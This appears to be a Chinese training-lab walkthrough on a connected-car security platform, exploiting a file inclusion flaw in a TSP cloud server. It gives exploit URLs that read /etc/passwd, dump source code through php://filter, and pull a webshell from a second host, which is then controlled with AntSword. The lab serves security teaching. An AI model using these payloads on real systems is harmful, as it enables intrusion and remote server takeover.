智能網(wǎng)聯(lián)汽車信息安全實訓(xùn)平臺的文件包含漏洞實驗,測試方案覆蓋車機(jī)軟件、車載通信、車內(nèi)智能終端設(shè)備、車內(nèi)總線等檢測環(huán)境。
通過指導(dǎo)學(xué)生上機(jī)實踐,讓學(xué)生學(xué)習(xí)利用TSP云平臺的文件包含漏洞進(jìn)行攻擊的基本原理和操作過程,了解除汽車本身外,TSP平臺可能存在的安全威脅,并加強(qiáng)安全防護(hù)意識。
本實驗介紹一種對TSP云平臺進(jìn)行文件包含漏洞利用的基本過程。利用本地文件包含查看服務(wù)器端的隱私文件,利用遠(yuǎn)程文件包含向服務(wù)器上傳木馬,并使用中國蟻劍連接木馬,從而實現(xiàn)對服務(wù)器的遠(yuǎn)程控制。
依賴軟件工具:中國蟻劍
一個網(wǎng)站管理工具,也常用于授權(quán)人員對網(wǎng)站的安全滲透測試。本實驗使用這個工具連接在遠(yuǎn)程文件包含中植入的網(wǎng)站木馬。
依賴硬件工具
Windows系統(tǒng)PC,Ubuntu系統(tǒng)工控機(jī)。
實驗步驟
實驗流程和網(wǎng)絡(luò)拓?fù)?/p>
1.搜索到TSP云平臺的文件包含漏洞
打開TSP云平臺登錄頁面,觀察到URL的參數(shù)filename的值是一個login.php,是一個頁面,因此推測該平臺存在文件包含漏洞。
http://192.168.9.135/include.php?filename=login.php
代碼使用了文件包含函數(shù)
使用以下命令測試,可以確定漏洞確實存在。
http://192.168.9.135/include.php?filename=/etc/passwd
驗證存在文件包含漏洞
2.使用本地文件包含來讀取本地文件隱私數(shù)據(jù)
本實驗在test目錄內(nèi)放了兩個key.php文件。使用以下命令讀取key1.php,可以得到解析后的內(nèi)容。
http://192.168.9.135/include.php?filename=test/key1.php
可以直接讀取服務(wù)器端的文件內(nèi)容
使用同樣的方法讀取key2.php,發(fā)現(xiàn)不能直接讀取到key信息。
http://192.168.9.135/include.php?filename=test/key2.php
無法看到完整的源代碼
為了獲取到源代碼的內(nèi)容,可以利用php偽協(xié)議,讀取key2.php經(jīng)過base64加密后的數(shù)據(jù)。 http://192.168.9.135/include.php?filename=php://filter/read=convert.base64-encode/resource=test/key2.php
顯示編碼后的php文件源代碼
將base64密文解碼,就可以得到源碼中隱藏的key。
看到解碼后的源碼內(nèi)容
3.使用遠(yuǎn)程文件包含來植入木馬
除了讀取服務(wù)器端的本地文件,還可以利用遠(yuǎn)程文件包含向服務(wù)器上傳木馬,從而控制服務(wù)器。本實驗已經(jīng)在本地部署了一個apache服務(wù)器,并定義了木馬生成文件 “shell.txt”。
上傳木馬
訪問以下網(wǎng)址來上傳木馬: http://192.168.9.135/include.php?filename=http://10.88.20.117/shell.txt
植入木馬
4.通過菜刀或中國蟻劍來連接木馬,遠(yuǎn)程控制服務(wù)器
打開中國蟻劍,點擊右鍵,選擇 “添加數(shù)據(jù)”,在 “URL地址” 中輸入上一步上傳木馬使用的URL,連接密碼為 “shell”。點擊 “測試連接”,顯示連接成功后,點擊左上角 “添加” 來確認(rèn)添加此連接。
使用中國蟻劍連接木馬
雙擊該連接,可以看到網(wǎng)站后臺的所有文件,并且可以進(jìn)行新建目錄、上傳文件等操作。
實現(xiàn)對服務(wù)器的遠(yuǎn)程控制
fqj
評論
查看更多